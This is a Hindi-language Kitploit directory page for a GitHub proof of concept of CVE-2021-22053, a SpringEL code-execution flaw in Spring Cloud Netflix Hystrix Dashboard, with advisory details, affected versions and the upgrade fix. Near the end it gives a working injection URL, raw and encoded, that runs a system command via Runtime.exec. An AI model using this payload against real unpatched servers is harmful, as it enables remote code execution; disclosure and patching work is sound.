Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता CVE-2021-22053 | Kitploit
उपकरण/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता CVE-2021-22053

रिपॉजिटरी देखें
378103 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता

गंभीरता

उच्च

विक्रेता

VMware द्वारा Spring

विवरण

दोनों spring-cloud-netflix-hystrix-dashboard और spring-boot-starter-thymeleaf का उपयोग करने वाले अनुप्रयोग, व्यू टेम्पलेट्स के रिज़ॉल्यूशन के दौरान अनुरोध URI पथ में प्रस्तुत कोड को निष्पादित करने का एक तरीका उजागर करते हैं। जब /hystrix/monitor;[user-provided data] पर अनुरोध किया जाता है, तो hystrix/monitor के बाद के पथ तत्वों का मूल्यांकन SpringEL अभिव्यक्तियों के रूप में किया जाता है, जिससे कोड निष्पादन हो सकता है।

प्रभावित VMware उत्पाद और संस्करण

जब तक अन्यथा न कहा जाए, गंभीरता उच्च है।

  • Spring Cloud Netflix
    • 2.2.0.RELEASE से 2.2.9.RELEASE
    • पुराने, असमर्थित संस्करण भी प्रभावित हैं

शमन

प्रभावित संस्करणों के उपयोगकर्ताओं को निम्नलिखित शमन लागू करना चाहिए: उपयोगकर्ताओं को 2.2.10.RELEASE+ पर अपग्रेड करना चाहिए। कोई अन्य कदम आवश्यक नहीं हैं। इस समस्या को ठीक करने वाले रिलीज़ में शामिल हैं:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

श्रेय

यह भेद्यता SecCoder Security Lab के threedr3am द्वारा पहचानी गई और जिम्मेदारीपूर्वक रिपोर्ट की गई ([email protected])।

संदर्भ

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

इतिहास

2021-11-17: प्रारंभिक भेद्यता रिपोर्ट प्रकाशित हुई।

POC

कच्चा:

http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

एन्कोडेड:

http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. कमांड में विकर्ण बार '/' नहीं दिया जा सकता।

टूल डाउनलोड करें